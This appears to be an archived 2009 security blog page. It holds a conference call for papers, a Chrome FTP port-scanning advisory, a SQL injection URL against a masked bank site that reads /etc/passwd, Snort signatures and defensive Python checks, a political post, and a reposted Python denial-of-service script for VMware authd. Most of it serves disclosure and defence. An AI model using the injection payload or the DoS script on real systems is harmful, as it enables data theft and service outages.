Monday, January 5, 2009

uCon - Call for Participation

Introduction

uCon will be a totally informal and non-profit conference taking place in Recife, Brazil, on the 28th of February 2009 -- three days after the best street carnival ever (also known as the rehearsal of the end of the world).
The conference aims to bring together academics, hackers and information security enthusiasts to share cutting-edge ideas and thoughts about their latest developments and techniques in the field. Attendees will have the opportunity to network with like-minded people during social events, such as the lunch break and the aftercon party, and during the capture-the-flag competition.

The venue

The conference will be held at Jardins Bar e Restaurante, one of the city's most famous clubs. Its infrastructure includes a very comfortable ballroom with capacity for up to 500 people.

Who?

The usual gang of cretins, the usual suspects.

Topics

The uCon committee gives preference to lectures with practical demonstrations.

The conference staff will try to provide all equipment needed for the presentation in case the author cannot provide it.

Topics include, but are not limited to:

* General system exploitation techniques, vuln-dev and shellcoding
* Web application hacking
* Phone phreaking
* Fuzzing and application security test
* Hardware hacking, embedded systems and other electronic devices
* Mobile devices exploitation, Symbian, P2K and bluetooth technologies
* Analysis of virus, worms and all sorts of malware
* Reverse engineering
* Rootkits
* Security in Wi-Fi and VoIP environments
* Information about smartcard and RFID security and similar technologies
* Technical approach to alternative operating systems
* Denial of service attacks and/or counter-measures
* Techniques for development of secure software and systems
* Security in SCADA and lesser-known environments
* Cryptography
* Information about satellites, GPS and the like
* Lockpicking, trashing and urban exploration
* Internet, privacy and Big Brother
* Information warfare and industrial espionage

Costs

uCon staff tried to keep an affordable price for attendees and the early bird entry price is R$ 60. Registration on-site will cost R$ 80. Lunch, free pass to the aftercon party in Jardins club and access to the workshops are included within the ticket price.

Deadline and submissions

Deadline for proposal submission: 25th of January 2009

Deadline for acceptance: 5th of February 2009

Send your proposal to cfp@ucon-conference.org and make sure to provide along with your submission the following details:

* Speaker name or handle
* A short biography of the presenter
* A brief description about your talk
* Estimated time-length of presentation
* Whether you need a visa to enter Brazil or not
* Any technical requirements for your lecture

Unlike the past edition, when speakers could choose how many minutes of presentation time they needed, this time we will have pre-determined time slots of 45 minutes and a block of 5-minute lightning talks where you can just step up to the mic and say whatever you want to say.

The preferred file format for papers and slides is PDF. If you feel old school enough you can submit them in TXT as well.

Speakers are asked, but not obliged, to hand in the slides used in their lectures.

NOTE: If your presentation involves advertising products or services, or any kind of sales pitch, please do not submit.

Information for speakers

Speakers' privileges are:

* Free pass to the conference
* 15 minutes of fame and glory (just to prove Andy Warhol was right)
* Heavy amounts of alcohol, including caipirinha and assorted booze
* Tour to Porto de Galinhas and other paradise beaches on the south shore of Pernambuco
* All the parties money can buy
* We will try our best to cover travelling costs up to USD 750

Other information

For further information please check out our web site, http://www.ucon-conference.org, which will be updated with everything regarding the conference.

To speak at uCon 2009, please send your proposal to cfp@ucon-conference.org

Sunday, January 4, 2009

Video Section - EvilFingers.com

We have come up with a video section for our users to build and update their skill set. We are producing a series of videos in different categories, including but not limited to the following:

* Tools
* Process
* Procedure/Working
* Coding & Testing
* Troubleshooting
* and other stuff...

If you have comments or concerns, contact us at contact.fingers @ gmail.com

- EF

Google Chrome FTP PASV IP Malicious Scanning Vulnerability.

---------------------------------------------------
Advisory: Google Chrome FTP PASV IP Malicious Scanning Vulnerability.

Version Affected: Google Chrome: 1.0.154.36

Release Date:
Disclosed: 1 January 2009
Released: 4 January 2009

Description:
The Google Chrome FTP client is vulnerable to FTP PASV malicious port scanning. The username in an FTP URL (ftp://username:password@domain.com) can be tampered with so that it carries an IP address and a port (ftp://xxx.xxx.xxx.xxx-22:password@domain.com). The Google Chrome FTP client connects to a rogue FTP server, which uses PASV commands to scan the network. Dynamic requests are issued to the rogue FTP server, which accepts connections with different usernames (the IP address with the specified port) in order to locate a non-existent object on the target domain. JavaScript port scanning is used to exploit this issue. A malicious web page hosted on a specially-coded FTP server could use this feature to perform a generic port scan of machines inside the victim's firewall. The generated fraudulent requests allow an attacker to expose internal network information through sustained port scanning via JavaScript.
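As an added illustration of the two points in the description above (my own code, not the advisory's proof-of-concept), the following Python checks, written from the defender's side, flag FTP URLs whose username is shaped like xxx.xxx.xxx.xxx-22 and validate a server's 227 PASV reply against the address of the control connection. Refusing a PASV address that differs from the server the client connected to is an assumed client-hardening policy, and all sample values are constructed.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Username shaped like "10.0.0.5-22": a dotted IPv4 address, a dash, a port.
SCAN_USER_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})-(\d{1,5})$")
# RFC 959 passive-mode reply: 227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)
PASV_RE = re.compile(r"^227 .*\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def suspicious_ftp_url(url):
    """Return (ip, port) when an ftp:// URL carries an address-and-port
    username of the form the advisory describes, otherwise None."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "ftp" or not parts.username:
        return None
    m = SCAN_USER_RE.match(parts.username)
    if not m:
        return None
    try:
        ip = str(ipaddress.IPv4Address(m.group(1)))  # rejects e.g. 999.1.1.1
    except ValueError:
        return None
    port = int(m.group(2))
    return (ip, port) if 1 <= port <= 65535 else None


def safe_pasv_target(reply, control_peer_ip):
    """Parse a 227 reply and return (ip, port) for the data connection only
    when it points back at the server that sent it (assumed client policy);
    raise ValueError for a malformed reply or a redirect to another host."""
    m = PASV_RE.match(reply.strip())
    if not m:
        raise ValueError("malformed PASV reply: %r" % reply)
    h = m.groups()
    ip = str(ipaddress.IPv4Address(".".join(h[:4])))  # ValueError if not an IPv4
    port = int(h[4]) * 256 + int(h[5])
    if ip != control_peer_ip:
        raise ValueError("PASV address %s differs from control peer %s"
                         % (ip, control_peer_ip))
    if not 1 <= port <= 65535:
        raise ValueError("PASV port out of range: %d" % port)
    return (ip, port)
```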

Proof-of-Concept: http://www.secniche.org/gcfpv/

Credit:
Aditya K Sood (Founder, www.Secniche.org / Team Lead, www.EvilFingers.com)

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.

---------------------------------------------------

SQLInjection for Bank

Credit for Exploit: Rohit Bansal

Exploit:
http://www.BankXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.com/news.asp?id=4+and+1=2+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7--

Vulnerable Variable: id=
Vulnerable File Frame: /news.asp?
SQL: UNION SELECT

Countermeasure:

Use the combination above (file, variable and SQL keyword) to check that your Snort signature prevents the attack.

Examples in EmergingThreats format:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+SELECT.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UNION SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id INSERT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+INSERT.+INTO/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id DELETE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+DELETE.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id ASCII"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+ASCII\(.+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UPDATE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UPDATE.+SET/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
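To check the rules above against the post's own exploit, here is an added Python harness (my code, not EvilFingers' or EmergingThreats') that applies the six pcre: bodies to constructed access-log lines. It assumes the sensor percent-decodes the URI and turns '+' into spaces before matching; it also adds a tightened UNION pattern, because the page's UNION\s+SELECT pattern does not match the UNION ALL SELECT form used in the exploit.

```python
import re
from urllib.parse import unquote_plus

# pcre: bodies of the six rules above, same flags (case-insensitive, on the normalised URI).
PAGE_RULES = {
    "SELECT": re.compile(r".+SELECT.+FROM", re.I),
    "UNION SELECT": re.compile(r".+UNION\s+SELECT", re.I),
    "INSERT": re.compile(r".+INSERT.+INTO", re.I),
    "DELETE": re.compile(r".+DELETE.+FROM", re.I),
    "ASCII": re.compile(r".+ASCII\(.+SELECT", re.I),
    "UPDATE": re.compile(r".+UPDATE.+SET", re.I),
}
# Tightened variant (mine): the page's UNION pattern wants SELECT right after UNION,
# so "UNION ALL SELECT", the form used in the exploit above, slips past it.
HARDENED = re.compile(r"UNION\s+(?:ALL\s+|DISTINCT\s+)?SELECT", re.I)
ALL_RULES = dict(PAGE_RULES, HARDENED=HARDENED)

def normalise_uri(raw_uri):
    """Percent-decode and turn '+' into spaces before matching (assumes the sensor
    normalises the URI the way a WAF or log parser would)."""
    return unquote_plus(raw_uri)

def matches(uri, rules):
    """Names of the rules that fire on one request URI; the uricontent: checks
    gate on /news.asp? and id= exactly as the signatures do."""
    low = uri.lower()
    if "/news.asp?" not in low or "id=" not in low:
        return []
    norm = normalise_uri(uri)
    return [name for name, rx in rules.items() if rx.search(norm)]

def scan_log(lines, rules=ALL_RULES):
    """Map 1-based line number -> fired rule names for 'METHOD URI PROTO' lines."""
    hits = {}
    for n, line in enumerate(lines, 1):
        fields = line.split(" ")
        fired = matches(fields[1], rules) if len(fields) > 1 else []
        if fired:
            hits[n] = fired
    return hits

# Constructed access-log lines: a normal request, the exploit from this post,
# a plain UNION SELECT, and the same payload against a file the rules do not watch.
SAMPLE_LOG = [
    "GET /news.asp?id=4 HTTP/1.1",
    "GET /news.asp?id=4+and+1=2+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7-- HTTP/1.1",
    "GET /news.asp?id=4+union+select+1,2,3+from+users-- HTTP/1.1",
    "GET /index.asp?id=4+union+select+1,2,3+from+users-- HTTP/1.1",
]
```

scan_log(SAMPLE_LOG) reports line 2 caught only by HARDENED and line 3 by SELECT, UNION SELECT and HARDENED; lines 1 and 4 produce no hits.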

Disclosure: EvilFingers guarantees neither the exploit nor the signature.

Contact us at Contact.Fingers @ gmail.com for any further questions.

- EF

Saturday, January 3, 2009

Crisis in the Middle East

News Agencies call it "Crisis in the Middle East", but is it really "War" or "Terrorism".

NOTE: We are talking from a neutral stand point. We neither support war, nor terrorism.

Some of the questions that could arise in the mind of common people...

(1) How is it that politicians have always played a great role, from the days of Caesar?
(2) How is it called "War" when some set of countries initiate it, whereas when certain others do the same it is called "terrorism"?
(3) Why do the common people on both sides of the war [winning side, losing side] have to be affected by a decision that they were not a part of?
(4) Is this crisis only in the Middle East, or is this a "World Crisis"?
(5) Why do neighboring countries become a test bed for newer weapons technology?
(6) Why do the UN or international peace organizations wait for developed nations' response before taking a step to stabilize such situations?
(7) Why do politics and religion play a major role in war?
(8) Who gave developed nations permission to make the decision on "Who is right and who is wrong", "Who can buy or test weapons and who cannot", etc., when they themselves did the same things before attaining "Developed" status?

Just thought of sharing some of the questions that a layman might think about when such situations recur in a cyclic fashion. History repeats itself, but it wouldn't if people started thinking wisely [which is almost impossible].

- EF

Vmware <= 2.5.1 build-126130 Remote Denial of Service

We just saw a PoC for VMware and it looks pretty cool, so we thought of sharing it with our users.

Credits: Laurent Gaffié

Link: http://www.milw0rm.com/exploits/7647

********START OF PASTE**********

-------------------------------------------------------

Vmware <= 2.5.1 build-126130 Remote Denial of Service

Application: Vmware

Web Site: http://www.vmware.com/

Platform: Windows *

Bug: Remote Denial of Service

Tested against: VMware Player 2.5.1 build-126130, Workstation 2.5.1 build-126130, using Windows XP SP3 fully patched

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Credits

================

1) Introduction

================

"VMware desktop virtualization technology lets you run multiple operating systems on a single physical computer.
Easily run Windows applications on your Mac, including high end games and other graphic applications,
with VMware Fusion. Run Windows and Linux applications on Windows or Linux PCs with the free VMware Player."

=======

2) Bug

=======
Vmware-authd listens on 0.0.0.0 port 912 on a Windows box by default.
A denial of service exists in the module vmwarebase.dll of the system process vmware-authd.exe when a long username
or password is supplied to the service; code execution doesn't look possible at this time.
A dump file will be created here: C:\Documents and Settings\LocalService\Application Data\VMware\vmware-authd-*.dmp
Also, some old versions of this binary (like 6.00.3938.0000) don't seem vulnerable to this DoS.

==================

3) Proof of concept

==================
Auth-dos.py :

import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = 'A' * 350
target = '192.168.0.102'
port = 912
s.connect((target, port))
data = s.recv(1024)
s.send('USER '+buff+'\r\n')
data = s.recv(1024)
s.send('PASS yo \r\n')
data = s.recv(1024)
print " [+] sending dummy payload"
s.close()
print " [+] done! "

=====

4) Credits

=====

Laurent Gaffié

laurent.gaffie{remove_this}[at]gmail[dot]com

# milw0rm.com [2009-01-02]

********END OF PASTE**********

Friday, January 2, 2009

71 Russian Publications released!!!

The beginning of 2009 has given us a good start so far. Thanks to all our team members' hard work and contributions, we are on the path to a stable community site.

Kris Kaspersky is releasing 71 Russian articles for our viewers, so they can enjoy 2009 with some good reading. We now have a total of 507 Russian publications so far and we are expecting some more to be released soon.

Do keep us posted if you have any questions or any other stuff. You can always contact us at Contact.fingers @ gmail.com [GMAIL Rocks!!!].

- EF